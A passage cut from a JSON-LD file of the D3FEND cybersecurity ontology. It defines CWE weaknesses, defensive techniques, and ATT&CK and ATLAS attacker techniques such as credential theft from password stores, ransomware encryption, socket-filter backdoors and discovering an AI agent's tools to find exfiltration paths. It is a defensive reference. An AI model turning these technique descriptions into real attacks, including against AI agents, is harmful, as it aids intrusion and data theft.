      "d3f:cwe-id": "CWE-915",
      "d3f:definition": "The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.",
      "d3f:synonym": [
        "AutoBinding",
        "Mass Assignment",
        "PHP Object Injection"
      ],
      "rdfs:label": "Improperly Controlled Modification of Dynamically-Determined Object Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-913"
      }
    },
    {
      "@id": "d3f:AccountLocking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccountLocking"
      ],
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-AL",
      "d3f:definition": "The process of temporarily disabling user accounts on a system or domain.",
      "d3f:disables": {
        "@id": "d3f:UserAccount"
      },
      "d3f:kb-article": "## How it works\nManagement servers with enterprise policies for account management provide the ability to enable and disable account for given rules. The rules may include specific periods of time (eg. weekend, plant shutdown, leave periods), specific user types or groups, or individual users.\n\n## Considerations\n* Local accounts caches vs centralized account management\n* Single Sign-on\n* Role based vs Attribute based systems\n\n## Examples of account configuration stores\n* Directory Services\n* Active Directory\n* RADIUS\n* LDAP\n* Oracle User Account Management\n* JumpCloud",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies"
        },
        {
          "@id": "d3f:Reference-FrameworkForNotifyingADirectoryServiceOfAuthenticationEventsProcessedOutsideTheDirectoryService_OracleInternationalCorp"
        }
      ],
      "rdfs:label": "Account Locking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:Nfe1b1c319e1a47a2a5a5ab380289365f"
        }
      ]
    },
    {
      "@id": "_:Nfe1b1c319e1a47a2a5a5ab380289365f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:NetworkFlow",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A summarization of network transactions between a client and server. It often summarizes bytes sent, bytes received, and protocol flags.",
      "d3f:summarizes": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Flow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Na44e988782a94cc3ba733731de108416"
        }
      ]
    },
    {
      "@id": "_:Na44e988782a94cc3ba733731de108416",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:summarizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:KernelModuleLoadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the loading of a kernel module, such as a device driver or dynamically linked extension, into the operating system kernel to extend or modify its capabilities.",
      "rdfs:label": "Kernel Module Load Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelModuleEvent"
        },
        {
          "@id": "_:Naf2a1525de914e0c8eacceab6804431d"
        }
      ]
    },
    {
      "@id": "_:Naf2a1525de914e0c8eacceab6804431d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:CWE-456",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-456",
      "d3f:definition": "The product does not initialize critical variables, which causes the execution environment to use unexpected values.",
      "rdfs:label": "Missing Initialization of a Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-909"
      }
    },
    {
      "@id": "d3f:CCI-001310_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system checks the validity of organization-defined inputs.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001310"
    },
    {
      "@id": "d3f:OTPauseCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to pause a service/program.",
      "rdfs:label": "OT Pause Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N1ad37f06b98c469a98d015268e364819"
        },
        {
          "@id": "_:Na19aab4b95c146d6a2b5624344be2f0c"
        },
        {
          "@id": "_:N12df903481d444b0a1b5fc06c469e9af"
        }
      ]
    },
    {
      "@id": "_:N1ad37f06b98c469a98d015268e364819",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Na19aab4b95c146d6a2b5624344be2f0c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTPauseCommand"
      }
    },
    {
      "@id": "_:N12df903481d444b0a1b5fc06c469e9af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:CWE-22",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-22",
      "d3f:definition": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.",
      "d3f:synonym": [
        "Directory traversal",
        "Path traversal"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-668"
        },
        {
          "@id": "d3f:CWE-706"
        },
        {
          "@id": "_:Ne450a74dc9fa4f19a0da72e73270a75a"
        }
      ]
    },
    {
      "@id": "_:Ne450a74dc9fa4f19a0da72e73270a75a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T0874",
      "@type": "owl:Class",
      "d3f:attack-id": "T0874",
      "d3f:definition": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Hooking - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Hooking"
    },
    {
      "@id": "d3f:Reference-PublicKeyPinningExtensionForHTTP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc7469"
      },
      "d3f:kb-abstract": "RFC 7469 describes an HTTP extension that allows web host operators to instruct user agents to remember ('pin') the hosts' cryptographic identities over a period of time. This decreases the risk of MITM attacks due to compromised Certificate Authorities.",
      "d3f:kb-author": "C. Evans, C. Palmer, R. Sleevi",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "Public Key Pinning Extension for HTTP",
      "rdfs:label": "Reference - Public Key Pinning Extension for HTTP"
    },
    {
      "@id": "d3f:AML.T0084.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.001",
      "d3f:definition": "Adversaries may discover the tools the AI agent has access to. By identifying which tools are available, the adversary can understand what actions may be executed through the agent and what additional resources it can reach. This knowledge may reveal access to external data sources such as OneDrive or SharePoint, or expose exfiltration paths like the ability to send emails, helping adversaries identify AI agents that provide the greatest value or opportunity for attack.",
      "rdfs:label": "Tool Definitions - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Tool Definitions"
    },
    {
      "@id": "d3f:MemoryExtent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A memory extent is a defined, contiguous region of memory within a computing system, characterized by its size, location, and purpose. It represents an abstraction of physical or virtual memory used for storing data, instructions, or other computational artifacts.",
      "rdfs:label": "Memory Extent",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:TA0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:\n\nSYSTEM/root level\nlocal administrator\nuser account with admin-like access\nuser accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.",
      "d3f:display-order": 4,
      "rdfs:label": "Privilege Escalation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:DatabaseServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DatabaseApplication"
      },
      "d3f:definition": "A database server is a server which uses a database application that provides database services to other computer programs or to computers, as defined by the client-server model. Database management systems (DBMSs) frequently provide database-server functionality, and some database management systems (such as MySQL) rely exclusively on the client-server model for database access (while others e.g. SQLite are meant for using as an embedded database). For clarification, a database server is simply a server that maintains services related to clients via database applications.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Database_server"
      },
      "rdfs:label": "Database Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:N3cf6af48d9104ff5b97e53a84f687183"
        }
      ],
      "skos:altLabel": "Network Database Resource"
    },
    {
      "@id": "_:N3cf6af48d9104ff5b97e53a84f687183",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseApplication"
      }
    },
    {
      "@id": "d3f:FileTransferNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "File transfer network traffic is network traffic related to file transfers between network nodes. This includes only network traffic conforming to standard file transfer protocols, not custom transfer protocols.",
      "rdfs:label": "File Transfer Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1574.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574.014",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains)",
      "rdfs:label": "AppDomainManager",
      "rdfs:subClassOf": {
        "@id": "d3f:T1574"
      }
    },
    {
      "@id": "d3f:T1546.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.011",
      "d3f:creates": {
        "@id": "d3f:Shim"
      },
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)",
      "d3f:modifies": {
        "@id": "d3f:ShimDatabase"
      },
      "rdfs:label": "Application Shimming",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nd878d20d556a450093c0d99158629b25"
        },
        {
          "@id": "_:N4246d13bf7124c39addc2a4cdb10ac97"
        }
      ]
    },
    {
      "@id": "_:Nd878d20d556a450093c0d99158629b25",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Shim"
      }
    },
    {
      "@id": "_:N4246d13bf7124c39addc2a4cdb10ac97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShimDatabase"
      }
    },
    {
      "@id": "d3f:CWE-599",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-599",
      "d3f:definition": "The product uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements.",
      "rdfs:label": "Missing Validation of OpenSSL Certificate",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-295"
      }
    },
    {
      "@id": "d3f:Reference-RevokingaPreviouslyIssuedVerifiableCredential-Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/azure/active-directory/verifiable-credentials/how-to-issuer-revoke"
      },
      "d3f:kb-author": "Barclay Neira, Christer Ljung, Juan Camilo Ruiz, John Flores",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialRevocation"
      },
      "d3f:kb-reference-title": "Revoke a previously issued verifiable credential",
      "rdfs:label": "Reference - Revoke a previously issued verifiable credential - Microsoft"
    },
    {
      "@id": "d3f:DNSNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "DNS network traffic is network traffic related to queries and responses involving the Domain Name System. DNS traffic can involve clients, servers such as relays or resolvers. This includes only network traffic conforming to standard DNS protocol; not custom protocols.",
      "rdfs:label": "DNS Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1583.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.005",
      "d3f:definition": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)",
      "rdfs:label": "Botnet",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:CWE-1298",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1298",
      "d3f:definition": "A race condition in the hardware logic results in undermining security guarantees of the system.",
      "rdfs:label": "Hardware Logic Contains Race Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:GroupPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. Group Policy provides the centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. A version of Group Policy called Local Group Policy (\"LGPO\" or \"LocalGPO\") also allows Group Policy Object management on standalone and non-domain computers.",
      "rdfs:label": "Group Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1555",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:PasswordStore"
      },
      "d3f:attack-id": "T1555",
      "d3f:definition": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
      "d3f:may-access": {
        "@id": "d3f:DatabaseFile"
      },
      "rdfs:label": "Credentials from Password Stores",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nc76efc4c67514228b296678d79461838"
        },
        {
          "@id": "_:N913af1763c0b4c3591eb78db019674ec"
        }
      ]
    },
    {
      "@id": "_:Nc76efc4c67514228b296678d79461838",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordStore"
      }
    },
    {
      "@id": "_:N913af1763c0b4c3591eb78db019674ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseFile"
      }
    },
    {
      "@id": "d3f:T1127",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127",
      "d3f:definition": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
      "rdfs:label": "Trusted Developer Utilities Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:GroupManagementEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the creation, modification, or deletion of a group, or changes to its membership and privileges. Group management events facilitate the enforcement of role-based access control by organizing users and permissions into logical units for streamlined administration and policy enforcement.",
      "rdfs:label": "Group Management Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/group_management"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N42c8133f871947528bd10bbe6d0e868c"
        }
      ]
    },
    {
      "@id": "_:N42c8133f871947528bd10bbe6d0e868c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlGroup"
      }
    },
    {
      "@id": "d3f:T1499",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499",
      "d3f:definition": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)",
      "rdfs:label": "Endpoint Denial of Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002530_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains a separate execution domain for each executing process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002530"
    },
    {
      "@id": "d3f:T1205.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1205.002",
      "d3f:definition": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.",
      "rdfs:label": "Socket Filters",
      "rdfs:subClassOf": {
        "@id": "d3f:T1205"
      }
    },
    {
      "@id": "d3f:FastSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "Fast symbolic links, allow storage of the target path within the data structures used for storing file information on disk (e.g., within the inodes). This space normally stores a list of disk block addresses allocated to a file. Thus, symlinks with short target paths are accessed quickly. Systems with fast symlinks often fall back to using the original method if the target path exceeds the available inode space.",
      "owl:disjointWith": {
        "@id": "d3f:SlowSymbolicLink"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:label": "Fast Symbolic Link",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ],
      "skos:altLabel": "Fast Symlink"
    },
    {
      "@id": "d3f:Reference-CManualIntegerInitialization_GNU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.gnu.org/software/gnu-c-manual/gnu-c-manual.html#Integer-Types"
      },
      "d3f:kb-organization": "GNU",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableInitialization"
      },
      "d3f:kb-reference-title": "Integer Initialization in C",
      "rdfs:label": "Reference - Integer Initialization - GNU C Manual"
    },
    {
      "@id": "d3f:CWE-1123",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1123",
      "d3f:definition": "The product uses too much self-modifying code.",
      "rdfs:label": "Excessive Use of Self-Modifying Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:Reference-Reputation_of_an_entity_associated_with_a_content_item",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060253584A1"
      },
      "d3f:kb-author": "Christopher Dixon, Thomas Pinckney",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileHashReputationAnalysis"
      },
      "d3f:kb-reference-title": "Reputation of an entity associated with a content item",
      "rdfs:label": "Reference - Reputation of an entity associated with a content item"
    },
    {
      "@id": "d3f:T1537",
      "@type": "owl:Class",
      "d3f:attack-id": "T1537",
      "d3f:definition": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.",
      "rdfs:label": "Transfer Data to Cloud Account",
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:RestoreDiskImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreDiskImage"
      ],
      "d3f:d3fend-id": "D3-RDI",
      "d3f:definition": "Restoring a previously captured disk image a hard drive.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Restore Disk Image",
      "rdfs:subClassOf": {
        "@id": "d3f:RestoreObject"
      }
    },
    {
      "@id": "d3f:T1486",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1486",
      "d3f:definition": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)",
      "d3f:encrypts": {
        "@id": "d3f:File"
      },
      "d3f:uses": {
        "@id": "d3f:CryptographicKey"
      },
      "rdfs:label": "Data Encrypted for Impact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N180c7305e2f14b2da1999fc28a78da94"
        },
        {
          "@id": "_:N3eb3f08cfde546a19ea6f691d8a10574"
        }
      ]
    },
    {
      "@id": "_:N180c7305e2f14b2da1999fc28a78da94",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N3eb3f08cfde546a19ea6f691d8a10574",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:NetworkEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving network communications within or between digital systems.",
      "rdfs:label": "Network Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/categories/network"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N220358c0e74445ea8ca4c62247b8abaf"
        }
      ]
    },
    {
      "@id": "_:N220358c0e74445ea8ca4c62247b8abaf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:related",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x related y: x has a symmetric associative relation to y.",
      "rdfs:isDefinedBy": {
        "@id": "skos:related"
      },
      "rdfs:label": "related",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:ExternalContentInclusionFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A subroutine which handles a content inclusion directive from an original file. When invoked, the external content is included in the resulting open file.",
      "rdfs:label": "External Content Inclusion Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N7f63781581f54263a723227d671be52d"
        }
      ]
    },
    {
      "@id": "_:N7f63781581f54263a723227d671be52d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-432",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-432",
      "d3f:definition": "The product uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running.",
      "rdfs:label": "Dangerous Signal Handler not Disabled During Sensitive Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:ShadowStack",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copy-of": {
        "@id": "d3f:CallStack"
      },
      "d3f:definition": "A shadow stack is a mechanism for protecting a procedure's stored return address, such as from a stack buffer overflow. The shadow stack itself is a second, separate stack that \"shadows\" the program call stack. In the function prologue, a function stores its return address to both the call stack and the shadow stack. In the function epilogue, a function loads the return address from both the call stack and the shadow stack, and then compares them. If the two records of the return address differ, then an attack is detected.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Shadow_stack"
      },
      "rdfs:label": "Shadow Stack",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N6d40398ab777478abf8adda548dfab4c"
        }
      ]
    },
    {
      "@id": "_:N6d40398ab777478abf8adda548dfab4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copy-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CallStack"
      }
    },
    {
      "@id": "d3f:T1167",
      "@type": "owl:Class",
      "d3f:attack-id": "T1167",
      "d3f:definition": "In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.002",
      "rdfs:label": "Securityd Memory",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:HTTPPutEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP PUT method is used to replace all current representations of the target resource with the request payload.",
      "rdfs:label": "HTTP PUT Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:StandaloneHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
